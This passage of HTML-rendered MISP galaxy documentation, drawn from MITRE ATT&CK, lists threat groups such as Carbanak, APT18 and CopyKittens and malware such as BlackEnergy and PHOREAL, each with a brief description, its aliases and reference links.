<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0059">https://attack.mitre.org/wiki/Group/G0059</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/">https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_promethium_g0056"><a class="anchor" href="#_promethium_g0056"></a><a class="link" href="#_promethium_g0056">PROMETHIUM - G0056</a></h3>
<div class="paragraph">
<p>is an activity group that has been active since at least 2012. The group conducted a campaign in May 2016 and has heavily targeted Turkish victims. has demonstrated similarity to another activity group called NEODYMIUM due to overlapping victim and campaign characteristics. (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)</p>
</div>
<div class="paragraph">
<p>PROMETHIUM - G0056 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PROMETHIUM</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 965. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0056">https://attack.mitre.org/wiki/Group/G0056</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/">https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft%20Security%20Intelligence%20Report%20Volume%2021%20English.pdf">http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft%20Security%20Intelligence%20Report%20Volume%2021%20English.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_carbanak_g0008"><a class="anchor" href="#_carbanak_g0008"></a><a class="link" href="#_carbanak_g0008">Carbanak - G0008</a></h3>
<div class="paragraph">
<p>Carbanak is a threat group that mainly targets banks. It also refers to malware of the same name (Carbanak). It is sometimes referred to as FIN7, but these appear to be two groups using the same Carbanak malware and are therefore tracked separately. (Citation: Kaspersky Carbanak) (Citation: FireEye FIN7 April 2017)</p>
</div>
<div class="paragraph">
<p>Contributors: Anastasios Pingios</p>
</div>
<div class="paragraph">
<p>Carbanak - G0008 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Carbanak</p>
</li>
<li>
<p>Anunak</p>
</li>
<li>
<p>Carbon Spider</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 966. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0008">https://attack.mitre.org/wiki/Group/G0008</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/files/2015/02/Carbanak%20APT%20eng.pdf">https://securelist.com/files/2015/02/Carbanak%20APT%20eng.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html">https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_apt18_g0026"><a class="anchor" href="#_apt18_g0026"></a><a class="link" href="#_apt18_g0026">APT18 - G0026</a></h3>
<div class="paragraph">
<p>APT18 is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical. (Citation: Dell Lateral Movement)</p>
</div>
<div class="paragraph">
<p>APT18 - G0026 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>APT18</p>
</li>
<li>
<p>Threat Group-0416</p>
</li>
<li>
<p>TG-0416</p>
</li>
<li>
<p>Dynamite Panda</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 967. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0026">https://attack.mitre.org/wiki/Group/G0026</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/">http://www.secureworks.com/resources/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_copykittens_g0052"><a class="anchor" href="#_copykittens_g0052"></a><a class="link" href="#_copykittens_g0052">CopyKittens - G0052</a></h3>
<div class="paragraph">
<p>CopyKittens is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip. (Citation: ClearSky CopyKittens March 2017) (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)</p>
</div>
<div class="paragraph">
<p>CopyKittens - G0052 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CopyKittens</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 968. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0052">https://attack.mitre.org/wiki/Group/G0052</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/copykitten-jpost/">http://www.clearskysec.com/copykitten-jpost/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.clearskysec.com/wp-content/uploads/2017/07/Operation%20Wilted%20Tulip.pdf">http://www.clearskysec.com/wp-content/uploads/2017/07/Operation%20Wilted%20Tulip.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf">https://s3-eu-west-1.amazonaws.com/minervaresearchpublic/CopyKittens/CopyKittens.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gamaredon_group_g0047"><a class="anchor" href="#_gamaredon_group_g0047"></a><a class="link" href="#_gamaredon_group_g0047">Gamaredon Group - G0047</a></h3>
<div class="paragraph">
<p>Gamaredon Group is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government. (Citation: Palo Alto Gamaredon Feb 2017)</p>
</div>
<div class="paragraph">
<p>Gamaredon Group - G0047 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Gamaredon Group</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 969. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Group/G0047">https://attack.mitre.org/wiki/Group/G0047</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/">https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/</a></p></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_enterprise_attack_malware"><a class="anchor" href="#_enterprise_attack_malware"></a><a class="link" href="#_enterprise_attack_malware">Enterprise Attack - Malware</a></h2>
<div class="sectionbody">
<div class="paragraph">
<p>Name of ATT&amp;CK software.</p>
</div>
<div class="admonitionblock note">
<table>
<tr>
<td class="icon">
<i class="fa icon-note" title="Note"></i>
</td>
<td class="content">
Enterprise Attack - Malware is a cluster galaxy available in JSON format at <a href="https://github.com/MISP/misp-galaxy/blob/master/clusters/enterprise" class="bare">https://github.com/MISP/misp-galaxy/blob/master/clusters/enterprise</a> attack - malware.json[<strong>this location</strong>] The JSON format can be freely reused in your application or automatically enabled in <a href="https://www.github.com/MISP/MISP">MISP</a>.
</td>
</tr>
</table>
</div>
<div class="dlist">
<dl>
<dt class="hdlist1">authors</dt>
<dd>
<p>MITRE</p>
</dd>
</dl>
</div>
<div class="sect2">
<h3 id="_oldbait_s0138"><a class="anchor" href="#_oldbait_s0138"></a><a class="link" href="#_oldbait_s0138">OLDBAIT - S0138</a></h3>
<div class="paragraph">
<p>OLDBAIT is a credential harvester used by APT28. (Citation: FireEye APT28) (Citation: FireEye APT28) January 2017</p>
</div>
<div class="paragraph">
<p>Aliases: OLDBAIT, Sasfis</p>
</div>
<div class="paragraph">
<p>OLDBAIT - S0138 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>OLDBAIT</p>
</li>
<li>
<p>Sasfis</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 970. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0138">https://attack.mitre.org/wiki/Software/S0138</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf">https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_phoreal_s0158"><a class="anchor" href="#_phoreal_s0158"></a><a class="link" href="#_phoreal_s0158">PHOREAL - S0158</a></h3>
<div class="paragraph">
<p>PHOREAL is a signature backdoor used by APT32. (Citation: FireEye APT32 May 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: PHOREAL</p>
</div>
<div class="paragraph">
<p>PHOREAL - S0158 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PHOREAL</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 971. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0158">https://attack.mitre.org/wiki/Software/S0158</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html">https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cosmicduke_s0050"><a class="anchor" href="#_cosmicduke_s0050"></a><a class="link" href="#_cosmicduke_s0050">CosmicDuke - S0050</a></h3>
<div class="paragraph">
<p>CosmicDuke is malware that was used by APT29 from 2010 to 2015. (Citation: F-Secure The Dukes)</p>
</div>
<div class="paragraph">
<p>Aliases: CosmicDuke, TinyBaron, BotgenStudios, NemesisGemina</p>
</div>
<div class="paragraph">
<p>CosmicDuke - S0050 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>CosmicDuke</p>
</li>
<li>
<p>TinyBaron</p>
</li>
<li>
<p>BotgenStudios</p>
</li>
<li>
<p>NemesisGemina</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 972. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0050">https://attack.mitre.org/wiki/Software/S0050</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_h1n1_s0132"><a class="anchor" href="#_h1n1_s0132"></a><a class="link" href="#_h1n1_s0132">H1N1 - S0132</a></h3>
<div class="paragraph">
<p>H1N1 is a malware variant that has been distributed via a campaign using VBA macros to infect victims. Although it initially had only loader capabilities, it has evolved to include information-stealing functionality. (Citation: Cisco H1N1 Part 1)</p>
</div>
<div class="paragraph">
<p>Aliases: H1N1</p>
</div>
<div class="paragraph">
<p>H1N1 - S0132 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>H1N1</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 973. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0132">https://attack.mitre.org/wiki/Software/S0132</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities">http://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spaceship_s0035"><a class="anchor" href="#_spaceship_s0035"></a><a class="link" href="#_spaceship_s0035">SPACESHIP - S0035</a></h3>
<div class="paragraph">
<p>SPACESHIP is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps. (Citation: FireEye APT30)</p>
</div>
<div class="paragraph">
<p>Aliases: SPACESHIP</p>
</div>
<div class="paragraph">
<p>SPACESHIP - S0035 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SPACESHIP</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 974. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0035">https://attack.mitre.org/wiki/Software/S0035</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hi_zor_s0087"><a class="anchor" href="#_hi_zor_s0087"></a><a class="link" href="#_hi_zor_s0087">Hi-Zor - S0087</a></h3>
<div class="paragraph">
<p>Hi-Zor is a remote access tool (RAT) that has characteristics similar to Sakula. It was used in a campaign named INOCNATION. (Citation: Fidelis Hi-Zor)</p>
</div>
<div class="paragraph">
<p>Aliases: Hi-Zor</p>
</div>
<div class="paragraph">
<p>Hi-Zor - S0087 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Hi-Zor</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 975. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0087">https://attack.mitre.org/wiki/Software/S0087</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html">http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_textmate_s0146"><a class="anchor" href="#_textmate_s0146"></a><a class="link" href="#_textmate_s0146">TEXTMATE - S0146</a></h3>
<div class="paragraph">
<p>TEXTMATE is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with POWERSOURCE in February 2017. (Citation: FireEye FIN7 March 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: DNSMessenger, TEXTMATE</p>
</div>
<div class="paragraph">
<p>TEXTMATE - S0146 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>DNSMessenger</p>
</li>
<li>
<p>TEXTMATE</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 976. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0146">https://attack.mitre.org/wiki/Software/S0146</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/03/fin7%20spear%20phishing.html">https://www.fireeye.com/blog/threat-research/2017/03/fin7%20spear%20phishing.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_net_crawler_s0056"><a class="anchor" href="#_net_crawler_s0056"></a><a class="link" href="#_net_crawler_s0056">Net Crawler - S0056</a></h3>
<div class="paragraph">
<p>Net Crawler is an intranet worm capable of extracting credentials using credential dumpers and spreading to systems on a network over SMB by brute forcing accounts with recovered passwords and using PsExec to execute a copy of Net Crawler. (Citation: Cylance Cleaver)</p>
</div>
<div class="paragraph">
<p>Aliases: Net Crawler, NetC</p>
</div>
<div class="paragraph">
<p>Net Crawler - S0056 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Net Crawler</p>
</li>
<li>
<p>NetC</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 977. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0056">https://attack.mitre.org/wiki/Software/S0056</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance%20Operation%20Cleaver%20Report.pdf">https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance%20Operation%20Cleaver%20Report.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_blackenergy_s0089"><a class="anchor" href="#_blackenergy_s0089"></a><a class="link" href="#_blackenergy_s0089">BlackEnergy - S0089</a></h3>
<div class="paragraph">
<p>BlackEnergy is a malware toolkit that has been used by both criminal and APT actors. It dates back to at least 2007 and was originally designed to create botnets for use in conducting Distributed Denial of Service (DDoS) attacks, but its use has evolved to support various plug-ins. It is well known for being used during the confrontation between Georgia and Russia in 2008, as well as in targeting Ukrainian institutions. Variants include BlackEnergy 2 and BlackEnergy 3. (Citation: F-Secure BlackEnergy 2014)</p>
</div>
<div class="paragraph">
<p>Aliases: BlackEnergy, Black Energy</p>
</div>
<div class="paragraph">
<p>BlackEnergy - S0089 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BlackEnergy</p>
</li>
<li>
<p>Black Energy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 978. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0089">https://attack.mitre.org/wiki/Software/S0089</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.f-secure.com/documents/996508/1030745/blackenergy%20whitepaper.pdf">https://www.f-secure.com/documents/996508/1030745/blackenergy%20whitepaper.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_xagentosx_s0161"><a class="anchor" href="#_xagentosx_s0161"></a><a class="link" href="#_xagentosx_s0161">XAgentOSX - S0161</a></h3>
<div class="literalblock">
<div class="content">
<pre>(Citation: XAgentOSX) is a trojan that has been used by APT28 on OS X and appears to be a port of their standard CHOPSTICK or XAgent trojan. (Citation: XAgentOSX)</pre>
</div>
</div>
<div class="paragraph">
<p>Aliases: (Citation: XAgentOSX)</p>
</div>
<div class="paragraph">
<p>XAgentOSX - S0161 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>XAgentOSX</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 979. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0161">https://attack.mitre.org/wiki/Software/S0161</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/">https://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pisloader_s0124"><a class="anchor" href="#_pisloader_s0124"></a><a class="link" href="#_pisloader_s0124">Pisloader - S0124</a></h3>
<div class="paragraph">
<p>Pisloader is a malware family that is notable due to its use of DNS as a C2 protocol as well as its use of anti-analysis tactics. It has been used by APT18 and is similar to another malware family, HTTPBrowser, that has been used by the group. (Citation: Palo Alto DNS Requests)</p>
</div>
<div class="paragraph">
<p>Aliases: Pisloader</p>
</div>
<div class="paragraph">
<p>Pisloader - S0124 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Pisloader</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 980. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0124">https://attack.mitre.org/wiki/Software/S0124</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/">http://researchcenter.paloaltonetworks.com/2016/05/unit42-new-wekby-attacks-use-dns-requests-as-command-and-control-mechanism/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_backdoor_oldrea_s0093"><a class="anchor" href="#_backdoor_oldrea_s0093"></a><a class="link" href="#_backdoor_oldrea_s0093">Backdoor.Oldrea - S0093</a></h3>
<div class="paragraph">
<p>Backdoor.Oldrea is a backdoor used by Dragonfly. It appears to be custom malware authored by the group or specifically for it. (Citation: Symantec Dragonfly)</p>
</div>
<div class="paragraph">
<p>Aliases: Backdoor.Oldrea, Havex</p>
</div>
<div class="paragraph">
<p>Backdoor.Oldrea - S0093 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Backdoor.Oldrea</p>
</li>
<li>
<p>Havex</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 981. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0093">https://attack.mitre.org/wiki/Software/S0093</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/Dragonfly%20Threat%20Against%20Western%20Energy%20Suppliers.pdf">http://www.symantec.com/content/en/us/enterprise/media/security%20response/whitepapers/Dragonfly%20Threat%20Against%20Western%20Energy%20Suppliers.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_starloader_s0188"><a class="anchor" href="#_starloader_s0188"></a><a class="link" href="#_starloader_s0188">Starloader - S0188</a></h3>
<div class="paragraph">
<p>is a loader component that has been observed loading Felismus and associated tools. (Citation: Symantec Sowbug Nov 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: Starloader</p>
</div>
<div class="paragraph">
<p>Contributors: Alan Neville, @abnev</p>
</div>
<div class="paragraph">
<p>Starloader - S0188 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Starloader</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 982. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0188">https://attack.mitre.org/wiki/Software/S0188</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments">https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-south-american-and-southeast-asian-governments</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chches_s0144"><a class="anchor" href="#_chches_s0144"></a><a class="link" href="#_chches_s0144">ChChes - S0144</a></h3>
<div class="paragraph">
<p>ChChes is a Trojan that appears to be used exclusively by menuPass. It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. (Citation: Palo Alto menuPass Feb 2017) (Citation: JPCERT ChChes Feb 2017) (Citation: PWC Cloud Hopper Technical Annex April 2017)</p>
</div>
<div class="paragraph">
<p>Aliases: ChChes, Scorpion, HAYMAKER</p>
</div>
<div class="paragraph">
<p>ChChes - S0144 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>ChChes</p>
</li>
<li>
<p>Scorpion</p>
</li>
<li>
<p>HAYMAKER</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 983. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0144">https://attack.mitre.org/wiki/Software/S0144</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/">http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.jpcert.or.jp/2017/02/chches-malware&#8212;&#8203;93d6.html">http://blog.jpcert.or.jp/2017/02/chches-malware&#8212;&#8203;93d6.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf">https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hacking_team_uefi_rootkit_s0047"><a class="anchor" href="#_hacking_team_uefi_rootkit_s0047"></a><a class="link" href="#_hacking_team_uefi_rootkit_s0047">Hacking Team UEFI Rootkit - S0047</a></h3>
<div class="paragraph">
<p>Hacking Team UEFI Rootkit is a rootkit developed by the company Hacking Team as a method of persistence for remote access software. (Citation: TrendMicro Hacking Team UEFI)</p>
</div>
<div class="paragraph">
<p>Aliases: Hacking Team UEFI Rootkit</p>
</div>
<div class="paragraph">
<p>Hacking Team UEFI Rootkit - S0047 is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Hacking Team UEFI Rootkit</p>
</li>
</ul>
</div>
